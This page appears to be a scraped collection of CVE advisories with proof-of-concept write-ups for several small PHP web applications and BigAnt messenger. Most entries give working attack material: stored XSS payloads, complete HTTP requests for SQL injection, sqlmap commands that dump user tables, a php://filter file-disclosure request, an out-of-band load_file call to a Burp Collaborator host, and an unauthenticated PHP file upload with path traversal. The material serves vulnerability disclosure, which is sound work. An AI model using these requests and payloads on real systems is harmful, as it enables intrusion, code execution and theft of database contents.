Ecommerce-Website v1 was discovered to contain an arbitrary file upload vulnerability via /customer_register.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2022-27357: CVEs/POC.md at main · D4rkP0w4r/CVEs

Musical World v1 was discovered to contain an arbitrary file upload vulnerability via uploaded_songs.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2022-27064: GitHub - D4rkP0w4r/Musical-World-Unrestricted-File-Upload-RCE-POC

AeroCMS v0.0.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability via view_all_comments.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comments text field.

**AeroCMS-Comment-Stored\_XSS-POC**

*   `Note` => Don't need register or login account
*   `Description` => `Stored_XSS` at comment box

**Step to Reproduct**

*   Click `Read More` -> input payload `<img/src/onerror=prompt(10)>` at `Author` -> click `Submit` button

**Exploit****Vulnerable Code****POC**

*   `Injection Point`

comment\_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment\_email=bin%40gmail.com&comment\_content=hacked&create\_comment=

*   `Request`

POST /AeroCMS/post.php?p\_id=36 HTTP/1.1
Host: localhost:8080
Content-Length: 126
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/AeroCMS/post.php?p\_id=36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=loqbt1ibs376hge1s415srq441
Connection: close

comment\_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment\_email=bin%40gmail.com&comment\_content=hacked&create\_comment=

`POC VIDEO` https://drive.google.com/file/d/1GxOyX1JkG0trfdaCLfe06TR6WLIGoUXE/view?usp=sharing

CVE-2022-27063: GitHub - D4rkP0w4r/AeroCMS-Comment-Stored_XSS-Poc

Social Codia SMS v1 was discovered to contain a stored cross-site scripting (XSS) vulnerability via add_post.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Post Title text field.

**sms-Add\_Student-Stored\_XSS-POC**

Description => Stored\_XSS at `Add Student`

**Step to Reproduct**

*   Login to admin -> `Students` -> `Add Student` -> input payload `<img/src/onerror=prompt(10)>` at `Enter Name`

**Exploit**

![image](https://user-images.githubusercontent.com/79050415/158715096-7fe6c540-b7cb-4293-b60f-f0e16b6d445c.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/158716291-52718f20-b719-44ef-a9ca-21b00e82b2de.png)

*   When inserting into the database, the input is not filtered out bad characters

**POC**

*   `Injection Point`

\------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="name"

<img/src/onerror=prompt(10)>

*   `Request`

POST /sms/admin/addstudent.php HTTP/1.1
Host: localhost:8080
Content-Length: 992
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAvKt9LM2RnnkuA0K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/sms/admin/addstudent.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=p440fhd7svqid5f063i3epg29k
Connection: close

------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="image"; filename="car.png"
Content-Type: application/octet-stream


------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="rollno"

1234567
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="name"

<img/src/onerror=prompt(10)>
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="contact"

123456
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="standerd"

1
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="city"

Newyork
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="email"

haha@gmail.com
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="gender"

male
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="submit"

------WebKitFormBoundaryAvKt9LM2RnnkuA0K--

`POC VIDEO` https://drive.google.com/file/d/1PLRmIi7EBMAXkLMUhUy09PVph1CW6otF/view?usp=sharing

CVE-2022-27348: GitHub - D4rkP0w4r/sms-Add_Student-Stored_XSS-POC

Movie Seat Reservation v1 was discovered to contain an unauthenticated file disclosure vulnerability via /index.php?page=home.

Permalink

Cannot retrieve contributors at this time

**Movie Seat Reservation System File Disclosure**

*   `Note` => don't need login

**Exploit**

*   Exploit with Burp Suite

http://192.168.1.101:8080/Movie\_Seat\_Reservation\_System/index.php?page\=home

![image](https://user-images.githubusercontent.com/79050415/160242883-2539e290-9b33-4267-a38b-a2d37563b0a2.png)

*   Use Burp Suite capture request and payload => `Send` ![image](https://user-images.githubusercontent.com/79050415/160242922-7c29a7ac-787f-47b8-9052-6c5c2d7495cb.png)
*   Then decode `Base64`

 PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywnJywndGhlYXRlcl9kYicpb3IgZGllKCJDb3VsZCBub3QgY29ubmVjdCB0byBteXNxbCIubXlzcWxpX2Vycm9yKCRjb24pKTsNCg\==    

![image](https://user-images.githubusercontent.com/79050415/160243014-eff96877-37c4-41ba-b4ed-0359cbbece7b.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/160243179-1a4d1053-eb75-4a8c-9965-52d3eaeb5b18.png)

*   `Request`

GET /Movie\_Seat\_Reservation\_System/index.php?page\=php://filter/convert.base64\-encode/resource\=admin/db\_connect HTTP/1.1
Host: 192.168.1.101:8080
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.1.101:8080/Movie\_Seat\_Reservation\_System/
Accept\-Encoding: gzip, deflate
Accept\-Language: en\-US,en;q\=0.9
Cookie: PHPSESSID\=0722dtqnb1dgvuono8uubajcae
Connection: close

CVE-2022-28002: CVEs/POC.md at main · D4rkP0w4r/CVEs

Online Banking System in PHP v1 was discovered to contain multiple SQL injection vulnerabilities at /staff_login.php via the Staff ID and Staff Password parameters.

Permalink

Cannot retrieve contributors at this time

**Online Banking System SQL Injection**

*   `Description` => sql injection at `staff_login.php`

**Step to Reproduct**

*   `Staff Login` -> `Staff ID` \-> `Staff Password` -> `Login` -> `modify data` -> `Sqlmap`

**Exploit**

python3 sqlmap.py -r sqli.txt --batch --current-user

![image](https://user-images.githubusercontent.com/79050415/159328722-52415c05-ed4a-405b-ae9f-919692f58601.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/159329104-f6734379-6e0f-4344-a7a9-d4baa41d2e34.png)

*   No filter `Staff ID` and `Staff Password` when inserting data to database

**Information Disclosure**

![image](https://user-images.githubusercontent.com/79050415/159337062-c4045649-7665-4691-9a51-3d41d502d14e.png)

`Injection Point`

staff\_id=\*&password=hhhhhhhhhh&staff\_login-btn=LOGIN

*   `Request`

POST /Online-Banking/staff\_login.php HTTP/1.1
Host: 192.168.1.101:8080
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.101:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Online-Banking/staff\_login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jpkpok9b1tiholm7srir1b6mev
Connection: close

staff\_id=\*&password=hhhhhhhhhh&staff\_login-btn=LOGIN

CVE-2022-27991: CVEs/POC.md at main · D4rkP0w4r/CVEs

Car Rental System v1.0 was discovered to contain a SQL injection vulnerability at /Car_Rental/booking.php via the id parameter.

Permalink

Cannot retrieve contributors at this time

**Car Rental System SQL Injection**

*   `Note` => Login to customer
*   `Injection Point` => `http://192.168.1.101:8080/Car_Rental/booking.php?id=1`

**Exploit**

*   Exploit with `Sqlmap` + `Burp Suite` ![image](https://user-images.githubusercontent.com/79050415/159719099-d87a540c-b90f-49ca-8377-36bd97a4314e.png)
*   Use `Burp Suite` capture request
*   Then save as `sqlicar.txt`

GET /Car\_Rental/booking.php?id=1 HTTP/1.1
Host: 192.168.1.101:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Car\_Rental/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ci\_session=jo7rsp3d4su5223o11544otrc44odm2l; PHPSESSID=5cddkjjvh5nhvqh96t306gau8b
Connection: close

*   Exploit with `Sqlmap`

 python3 sqlmap.py -r sqlicar.txt --current-db

![image](https://user-images.githubusercontent.com/79050415/159721152-f8a48ce3-3cde-4743-bb4a-babb858e9e48.png)

python3 sqlmap.py \-r sqlicar.txt \-D carrentalp \-\-tables

![image](https://user-images.githubusercontent.com/79050415/159719187-a0e7785b-ddf4-4581-a7ca-75e3343f4b49.png)

**Information Disclosure**

![image](https://user-images.githubusercontent.com/79050415/159721411-55b6bdde-6ad6-4490-ac0e-a96e1a7bd1f7.png) ![image](https://user-images.githubusercontent.com/79050415/159721455-10c52b03-bc77-4aaf-8de1-684a30af17b7.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/159724951-39b8fd8b-9a6d-4797-846e-ca69b7767a8e.png)

*   No filter `id` when inserting data to database

CVE-2022-28000: CVEs/POC.md at main · D4rkP0w4r/CVEs

Movie Seat Reservation v1 was discovered to contain a SQL injection vulnerability at /index.php?page=reserve via the id parameter.

Permalink

Cannot retrieve contributors at this time

**Movie Seat Reservation System Sql Injection**

*   `Note` => exploit don't need login account

**Exploit**

*   Use Burp Suite capture request with payload ![image](https://user-images.githubusercontent.com/79050415/160153517-9ff10b72-e677-428d-b92b-9588f9e0bda7.png)

GET /Movie\_Seat\_Reservation\_System/index.php?page\=reserve&id\=(select%20load\_file('%5c%5c%5c%5coumvuo0qifuf18d8xd3vrtn81z7svqjhl5cs3gs.burpcollaborator.net%5c%5cbxr')) HTTP/1.1
Host: 192.168.1.101:8080
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Upgrade\-Insecure\-Requests: 1
Accept\-Encoding: gzip, deflate
Accept\-Language: en\-US,en\-GB;q\=0.9,en;q\=0.8
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Connection: close
Cache\-Control: max\-age\=0

Then save as `moviesqli.txt`

*   Exploit with `Sqlmap`

python3 sqlmap.py \-r moviesqli.txt \-\-current\-user

![image](https://user-images.githubusercontent.com/79050415/160154272-be4be6b5-64a1-495c-937e-65f50c2de43d.png)

python3 sqlmap.py \-r moviesqli.txt  \-\-batch \-dbs

![image](https://user-images.githubusercontent.com/79050415/160154484-41d6fc43-fd58-4180-9b60-440a554befc4.png)

python3 sqlmap.py \-r moviesqli.txt  \-\-batch \-tables \-D theater\_db

![image](https://user-images.githubusercontent.com/79050415/160154696-86ce3ceb-c2f3-4d58-b095-afd061e89ad3.png)

python3 sqlmap.py \-r moviesqli.txt  \-\-batch \-columns \-D theater\_db \-T users \-dump

![image](https://user-images.githubusercontent.com/79050415/160154865-82a9b67a-e37d-4cb1-aad2-76df5a18c5f5.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/160155334-4b64f616-2719-4e99-a8e0-dcbec0d42ea1.png)

*   No filter `id` when inserting data to database

CVE-2022-28001: CVEs/POC.md at main · D4rkP0w4r/CVEs

An Access Control vulnerability exists in BigAntSoft BigAnt office messenger 5.6 via im_webserver, which could let a malicious user upload PHP Trojan files.

Permalink

Cannot retrieve contributors at this time

Vulnerability Unauthorized arbitrary file upload (SYSTEM)

https://github.com/Flash1201/bug/blob/main/Vulnerability%20Unauthorized%20arbitrary%20file%20upload%20(SYSTEM).pdf

POST /index.php/Pan/Upload/upload/clientid/4.html?flag=input HTTP/1.1

Host: 192.168.5.25:8000

Content-Length: 1268

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuwEAN6czvjjYmBQL

Accept: \*/\*

Origin: http://192.168.5.25:8000

Referer: http://192.168.5.25:8000/index.php/Pan/Index/doc/root\_id/BD8455CA-FA46-33C4-BB7C-58D6F580B82F/clientid/4.html

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="file"; filename="4.php"

Content-Type: image/jpeg

<?php phpinfo();?>

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="root\_id"

../../../

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="folder\_id"

0

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="folder\_path\_id"

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="folder\_path\_name"

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="dir\_path"

\[""\]

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="user\_id"

4

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="user\_name"

Super Admin

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="saas\_id"

355DF852-7D5B-A37A-6D2D-1FD22DED7A57

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="saas\_dbname"

antdbms\_default

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="clientid"

4

\------WebKitFormBoundaryuwEAN6czvjjYmBQL--

https://github.com/Flash1201/bug/blob/main/2021-11-02\_16-56-09.gif

CVE-2021-43430: bug/bigant at main · Flash1201/bug

Queue poisoning attacks allegedly put accounts at risk of takeover

Tag

#apple